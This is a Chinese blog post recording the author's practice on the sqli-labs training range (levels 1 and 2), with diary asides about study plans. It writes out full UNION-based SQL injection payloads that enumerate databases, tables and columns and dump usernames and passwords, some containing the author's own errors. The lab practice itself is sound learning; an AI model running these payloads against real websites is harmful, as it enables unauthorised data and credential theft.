靶场练习--sqli(1&2)

前言

懒猪赵肥肥耍了3天3夜,每天除了练英语口语,啥子都没干。今天开始发愤图强,嘻嘻~ 计划内容有:靶场、视频、python、PHP、java、计算机英语。

首先,每天必搞靶场必看视频必学java和英语。2天硬性计划:15关,2视频,java学习4-6小时。......最后,如果我不学习,那我就是赵肥肥肥!

0x01 第一关 

Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)

1.首先判断闭合

(# 作用:注释%23,记住在手工的时候最好改为URL编码)

 2.当id=1,或者id=1' ,的时候,才会报错。所以这里理解的“基于错误的get单引号字符型注入”的意思就是:通过单引号是否有报错然后

然后判断是否有注入。所以在这里,我们通过报错来判断各种信息的准确性。

 

所以这里,我们判断他的字段数为3

 3.接下来猜数据库(一般看到的是当前数据库),注意id后面就不要加东西了,要不然报出来的可能只是本次登录的dumb

?id= ' union select null,database(),3%23

 

4.数据库名security拿到手,开始查看所有同类数据库名称

?id= ' union select null,(select group_concat(schema_name) from information_schema.schemata),null%23

 看到数据库的名字了,接下来看具体的表名。

5.查找security数据库的所有表名

 

?id= 'union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema = security and table_name = user)%23

 

 但是 数据库+表名 需要通过16进制的编码https://www.sojson.com/hexadecimal.html

0x7365637572697479
0x75736572

 

?id=%20%27union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema%20=%200x7365637572697479%20and%20table_name%20=%200x75736572)%23

 

 然后费了很大力气,看不懂这些是啥。。

错误原因:我在security数据库里面找有没有user这一列干嘛??要是没有找到,,那不就GG了。。所以我的sql注入盲区还有:认为注入就是瞎猜。。。我真是脑洞大开。。现在我们的目标是,在注入的时候,要让注入点吐出真正的东西,而不是自己去猜。

所以我们这步正确的打开方式:查询security里面所有的表名!列名有:users、emails...

?id= ' union select null,null,(select group_concat(table_name) from information_schema.tables where table_schema=database())%23

 

6.表名里面选择一个有价值的,爆破列名

?id= ' union select null,null,(select group_concat(column_name) from information_schema.columns where table_name='users')%23

7.发现目标username和password,继续挖掘,发现用户名和密码

?id=%20%27%20union%20select null,null,(select group_concat(username,0x3a,password) from users)%23

注意:group_concat函数,可以显示出具体的字符;group_concat(username,0x3a,password),这里面的0x3a就是起到一个分割的作用,如果我输入的是0x3b(;)那么出现的就是以分号为分隔符~

总结第一关:老套路,看报错,返回完全正常,那就是OK的。返回页面有问题(不是404、403那些。。),就是you注入点。我们应该通过提示信息,先判断字段,再猜数据库名字---全部数据库---某个特殊数据库包含的表名----表名得列名--爆密码。https://www.cnblogs.com/-zhong/p/10877728.html

【今天第一关!居然闯了一个半小时!啊!蠢货!明天继续】

 0x02 第二关

 GET - Error based - Intiger based (基于错误的GET整型注入)

 考研OR实习,我都苦恼几天了,每天做梦都是考研,又怕考上了耽搁了网络安全这条大船。毕竟成都网络空间安全少,走渗透更少。

唉。今天也想了一上午。。唉。。奈何身边大佬太多,无论是应用型还是学术型,都是让人瞠目结舌。

1.第一关加的 ' ,进行判断是否被过滤且通过返回错误查看是何种注入类型(字符型、数字型),在第二关这

http://blog.sina.com.cn/s/blog_5a5c92980102xfqg.html

3个字段,接下来猜数据库名

奇怪的很,id=* union select null,select(database()),null%23 查看数据库名,但是根据id的值随便填写,爆出不同的字符很正常更感觉就是密码了。。。然后我这里错了,因为id的值为-1,才能爆出数据库名,原因是:

  

通过security这个数据库,查看其他同级数据库(鸡肋???)

(select group_concat(schema_name) from information_schema.schemata)

还是进入security数据库,或者让他显示所有的表名

  • (select group_concat(table_name) from information_schema.tables where table_schema='security')
  • (select group_concat(table_name) from information_schema.tables where table_schema=databse())

 

选择一个看起来顺眼的表:

查找信息(列名),发现这个users表里面有形如password的敏感字段:

(select group_concat(column_name) from information_schema.columns where table_name='users')

显示密码:

  • schema_name -> table_name -> column_name,from后面的“单位”要和前面一致
  • 步骤不能乱,随意输入可能会显示出想要的信息,但是没有办法进一步继续
  • (,,,,,)括号里面用逗号
  • column column column

 

posted @ 2019-07-12 21:21  这醋好甜  阅读(448)  评论(0编辑  收藏  举报